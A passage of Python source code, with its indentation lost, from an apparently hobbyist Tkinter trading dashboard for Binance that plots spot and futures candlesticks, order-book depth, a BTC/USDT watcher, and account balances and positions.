app.Tree_Ord.tag_configure('short', background='#fce7e7')
kk +=1
if kk > len(TO_Tpl_Tmp2) and nm<=TO_CC+1:
app.Tree_Ord.delete(nm)
elif len(BnFAcc) == 0:
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC > 0:
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC >= len(GLO_L) and TO_CC >= len(GLO_S):
jj = TO_CC
elif TO_CC <= len(GLO_L) and len(GLO_L) >= len(GLO_S):
jj = len(GLO_L)
elif TO_CC <= len(GLO_S) and len(GLO_S) >= len(GLO_L):
jj = len(GLO_S)
GLO_L_Ci = 0
GLO_S_Ci = 0
for nm in range(jj):
if nm < TO_CC:
TO_It = app.Tree_Ord.item(nm+1)["values"]
if str(TO_It[0])== 'LONG':
y_liq = float(TO_It[2])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_L[GLO_L_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_L_txt[GLO_L_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_L_txt[GLO_L_Ci],text='Order LONG\n'+str(TO_It[2]))
GLO_L_Ci +=1
elif str(TO_It[0])== 'SHORT':
y_liq = float(TO_It[2])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_S[GLO_S_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_S_txt[GLO_S_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_S_txt[GLO_S_Ci],text='Order SHORT\n'+str(TO_It[2]))
GLO_S_Ci +=1
if len(GLO_L) > GLO_L_Ci-1:
for nm in range (int(GLO_L_Ci),len(GLO_L)):
app.graph_Cn.coords(GLO_L[nm],0,0,0,0)
app.graph_Cn.coords(GLO_L_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_L_txt[nm],text='')
if len(GLO_S) > GLO_S_Ci-1:
for nm in range (int(GLO_S_Ci),len(GLO_S)):
app.graph_Cn.coords(GLO_S[nm],0,0,0,0)
app.graph_Cn.coords(GLO_S_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_S_txt[nm],text='')
#Order Book Graph
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
#y0 = grMd + grSt/2 - ((float(mylist4[m][0])-yI0)/prSt)* grSt
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if m==0:
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Cn.coords(GAP, -500, y0, 800, y0)
app.graph_Cn.coords(GAPt, 805, y0)
if len(PnL_Pos_L) > 0 and len(PnL_Pos_S) > 0:
sTmp = '\n' + 'Price: ' + str(float(mylist4[m][0]))
else:
sTmp = 'Price: ' + str(float(mylist4[m][0]))
if len(PnL_Pos_L) > 0:
sTmp += '\n'+'Long PnL: ' + str(PnL_Pos_L)
if len(PnL_Pos_S) > 0:
sTmp += '\n'+'Short PnL: ' + str(PnL_Pos_S)
app.graph_Cn.itemconfigure(GAPt,text=sTmp)
#______________Timer for plotting the SPOT and FUTURES Candle chart of the pair
class Timer_Candle_Summ:
def __init__(self):
global TE_CndSm
global ss
global yI
global Lo
while True:
if PS1 == True:
sys_msg = ' SPOT/FUTURES Comparison candlestick chart ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = True
break
if should_run_S:
for i in range(400):
if not should_run_S:
sys_msg = ' SPOT/FUTURES Comparison candlestick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_S:
if i==0:
sys_msg = ' SPOT/FUTURES Comparison candlestick chart ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = False
if i > 0:
time.sleep(0.5)
myTup_DSp = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
mylist5_Sp=mylist3_Sp['asks'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=500)) #tupl
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
mylist5_Ft=mylist3_Ft['asks'] #list
#print(myTup11[1])
#sss41 = "BNBUSDT - trades"
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI0=float(myDicGr1Sp[287][1])
#print (myDicGr1[1][1])
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI0=float(myDicGr1Ft[287][1])
#print (yI0)
if i==0:
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
app.graph_Sm.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
ss = ""
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
GAP_Sp = app.graph_Sm.create_line(points,fill="blue",width=1,dash=(4,2))
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue")
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue")
elif prSt < 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue")
yp=1180
ypi=0
while yp > -500:
points=[]
yp = 1180 - ypi*12*4#12*4=1hour
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+36000-ypi*3600
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%H:%M")
app.graph_Tb.create_text(1180 - ypi*48,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*48,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1Sp)):
myDicGr1TT = myDicGr1Sp[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#print (len(myDicGr1))
for mm in range(len(myDicGr1Ft)):
myDicGr1TT = myDicGr1Ft[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 696 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "black"
else:
flc="black"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#__Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5_Ft))):
if float(mylist5_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5_Ft[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
if float(mylist4_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4_Ft[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
if m==0:
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Sm.coords(GAP_Sp, -500, y0, 800, y0)
app.graph_Sm.itemconfigure(GAP_SpT,text=float(mylist4_Ft[m][0]))
#______________BTC/USDT watcher timer
class Timer_BTCUSDT:
def __init__(self):
global TE_BU
while True:
if PS_BU == False:
sys_msg = ' BTC/USDT watcher is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_BU = True
break
if should_run_BU:
for i in range(400):
if not should_run_BU:
#print('Stopped...')
ss_BU = 'Stopped...' + '\n BTC/USDT watcher'
app.label_BU.config(text = ss_BU)
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
sys_msg = ' BTC/USDT watcher will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_BU:
if i==0:
sys_msg = ' BTC/USDT watcher is running.'
app.Sys_Msg(text1=sys_msg)
TE_BU = False
if i > 0:
time.sleep(0.5)
myTupSpK =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=5)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI_Sp_0=0
yI_Sp_1=0
for ii in range(len(myDicGr1Sp)):
if ii == 0:
yI_Sp_1=float(myDicGr1Sp[ii][3])
if float(myDicGr1Sp[ii][2])>yI_Sp_0:
yI_Sp_0=float(myDicGr1Sp[ii][2]) #High
if float(myDicGr1Sp[ii][2])<yI_Sp_1:
yI_Sp_1=float(myDicGr1Sp[ii][3]) #Low
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=5)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI_Ft_0=0
yI_Ft_1=1
for ii in range(len(myDicGr1Ft)):
if ii == 0:
yI_Ft_1=float(myDicGr1Ft[ii][3])
if float(myDicGr1Ft[ii][2])>yI_Ft_0:
yI_Ft_0=float(myDicGr1Ft[ii][2]) #High
if float(myDicGr1Ft[ii][2])<yI_Ft_1:
yI_Ft_1=float(myDicGr1Ft[ii][3]) #Low
ss_BU = 'SPOT: xx%, FUTURES xx%'
myTup_DSp = ('depth', bot.depth(symbol='BTCUSDT', limit=5)) #tupl
#print('SPOT D',myTup_DSp)
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol='BTCUSDT', limit=5)) #tupl
#print('FT D',myTup_DFt)
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%H:%M:%S] ")
xx1 = (float(mylist4_Sp[0][0])-yI_Sp_0)/(float(mylist4_Sp[0][0])/100)
ss_BU = time_local_str + 'SPOT: ' + "%.2f" % (xx1) + '%, '
xx2 = (float(mylist4_Ft[0][0])-yI_Ft_0)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx2) + '%, '
xx3 = (float(mylist4_Sp[0][0])-yI_Sp_1)/(float(mylist4_Sp[0][0])/100)
ss_BU += '\n' + time_local_str + 'SPOT: ' + "%.2f" % (xx3) + '%, '
xx4 = (float(mylist4_Ft[0][0])-yI_Ft_1)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx4) + '%, '
app.label_BU.config(text = ss_BU)
if (xx3<0 and xx4<0) or ((xx1<-0.25 and xx2<-0.25) and (-xx1>xx3 and -xx2>xx4)):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='pink'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='red'
elif (xx1>0 and xx2>0) or ((xx3>0.25 and xx4>0.25)and (xx3>(-xx1) and xx4>(-xx2))):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='lightgreen'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='green'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
#______________Balance Observer Timer
class Timer_AccBlns:
def __init__(self):
global TE_AB
i=0
while True:
if PS_AB == False:
sys_msg = ' Balance Observer is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_AB = True
break
if should_run_AB:
#for i in range(400):
if not should_run_AB:
#print('Stopped...')
sys_msg = ' Balance Observer will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_AB:
if i==0:
sys_msg = ' Balance Observer is running.'
app.Sys_Msg(text1=sys_msg)
TE_AB = False
if i > 0:
time.sleep(0.5)
BnAcc = bot.account()
BnAcc10 = BnAcc['balances']
ss = 'SPOT balance: ' #0 USDT'
#print(BnAcc10)
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if BnAcc101['asset'] =='USDT':
#print (BnAcc10[mm])
ss += str(BnAcc101['asset']) + "\nFree: " + str(BnAcc101['free']) + "USDT.\nLocked: " + str(BnAcc101['locked']) + ' USDT.'
app.label_BlnsSpt.config(text = ss)
BnFAcc = bot.futuresBalance()
#print(BnFAcc)
ss = 'FUTURE balance: ' #0 USDT'
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
#print(BnFAcc[mm])
ss += str(BnFAcc1['asset']) + '.'
ss += "\nAsset: " + str(BnFAcc1['balance']) + ".\nAvailable: " + str(BnFAcc1['withdrawAvailable'])
app.label_2.config(text = ss)
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['totalUnrealizedProfit']
ss += 'PnL: ' + str(BnFAcc1) + ' USDT'
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str_H=time_local_time.strftime("%H")
ss += '\n'
if float(time_local_str_H)>=11 and float(time_local_str_H)<=19:
ss += 'London '
if (float(time_local_str_H)>=16 and float(time_local_str_H)<=23) or float(time_local_str_H)==0:
ss += 'New York '
if float(time_local_str_H)>=0 and float(time_local_str_H)<=8: #1..9
ss += 'Sydney '
if float(time_local_str_H)>=2 and float(time_local_str_H)<=10: #3..11
ss += 'Tokyo '
app.label_PnL.config(text = ss)
BnFAcc=bot.userPositionInfo()
TrSc_P = app.Tree_Pos_VScrl.get()
TrSc_P=app.Tree_Pos.yview()
#print(TrSc_P)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
l = TP_CC+1
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if len(BnFAcc1)>0:
TP_SCh = True
if TP_CC > 0:
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if TP_It[1] == str(BnFAcc1['symbol']) and TP_It[0] == str(BnFAcc1['positionSide']):
app.Tree_Pos.item(nn, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
TP_SCh = False
#print(TP_It[0])
if TP_SCh == True and float(BnFAcc1['positionAmt']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Pos.insert(parent='',index='end',iid=l,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
l +=1
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
TP_Tpl_Tmp=[]
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
TP_Tpl_Tmp.append(app.Tree_Pos.item(nn)["values"])
#print(TP_Tpl_Tmp[nn-1])
#print(len(app.Tree_Pos.get_children()))
kk=0
nm=False
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if float(TP_It[3]) == 0 and float(TP_It[4]) == 0 and kk<=len(TP_Tpl_Tmp):
nm=True
km=False
for mm in range(kk,len(TP_Tpl_Tmp)):
#print(mm)
if float(TP_Tpl_Tmp[mm][3])!=0 and float(TP_Tpl_Tmp[mm][4])!=0 and km==False:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[mm][0],TP_Tpl_Tmp[mm][1],TP_Tpl_Tmp[mm][2],TP_Tpl_Tmp[mm][3],TP_Tpl_Tmp[mm][4],TP_Tpl_Tmp[mm][5],TP_Tpl_Tmp[mm][6],TP_Tpl_Tmp[mm][7]))
kk=mm+1
#print(nn,kk,mm)
km=True
if nm==True and km==False:
kk=len(TP_Tpl_Tmp)+1
else:
#print(nn,kk)
if nm==True and kk<TP_CC:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[kk][0],TP_Tpl_Tmp[kk][1],TP_Tpl_Tmp[kk][2],TP_Tpl_Tmp[kk][3],TP_Tpl_Tmp[kk][4],TP_Tpl_Tmp[kk][5],TP_Tpl_Tmp[kk][6],TP_Tpl_Tmp[kk][7]))
kk +=1
if kk>len(TP_Tpl_Tmp) and nn<=TP_CC+1:
app.Tree_Pos.delete(nn)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
for nn in range(1,TP_CC+1):
app.Tree_Pos.item(nn, tags=())
TP_Tpl_Tmp=app.Tree_Pos.item(nn)["values"]
if float(TP_Tpl_Tmp[3]) > 0:
app.Tree_Pos.item(nn,tags=('plus'))
elif float(TP_Tpl_Tmp[3]) <0:
app.Tree_Pos.item(nn,tags=('minus'))
app.Tree_Pos.tag_configure('plus', background='#d6f8d6')
app.Tree_Pos.tag_configure('minus', background='#fce7e7')
app.Tree_Pos.yview_moveto((TrSc_P[0]))
#print(TrSc_P[0])
if i == 0:
i = 1
#______________Timer of the orders chart (Orders book)
class Timer_OrdTmr:
def __init__(self):
global TE_OrdTmr
while True:
if PS_OT == False:
sys_msg = ' Chart of orders book ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = True
break
if should_run_OT:
for i in range(400):
if not should_run_OT:
sys_msg = ' Chart of orders book ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OT:
if i==0:
sys_msg = ' Chart of orders book ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=1000)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2; LIMIT=100 WEIGHT = 5;LIMIT=500 WEIGHT = 10;LIMIT=1000 WEIGHT = 20)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=1000)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
if (float(mylist5[m][1])*float(mylist5[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
for m in range (int(len(mylist4))):
if float(mylist4[m][1])>0:
if (float(mylist4[m][1])*float(mylist4[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
#______________Timer of the Zoom orders book
class Timer_Zoom:
def __init__(self):
global ss
global yI
global Lo
global yI0Zm
global TE_Zm
while True:
if Ord_Zm == False:
sys_msg = ' Zoom orders book ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Zm = True
break
if should_run_OZ:
for i in range(400):
if not should_run_OZ:
sys_msg = ' Zoom orders book ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OZ:
if i==0:
TE_Zm = False
sys_msg = ' Zoom orders book ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
if i > 0:
time.sleep(0.01)
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print (mylist4)
if i==0:
yI0Zm=float(mylist4[19][0])
grMd = grH/2
grSt = grZm/(yI0Zm*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
grStZ=1000/40
#Order Book Graph
app.graph_Zm.delete("all")
yI0Zm=float(mylist4[0][0])
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/200))*10
y1 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="pink",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist5[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist5[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist5[m][0]))
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/200))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="lightgreen",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist4[m][0]))
elif 0.001 > prSt >= 0.0001:
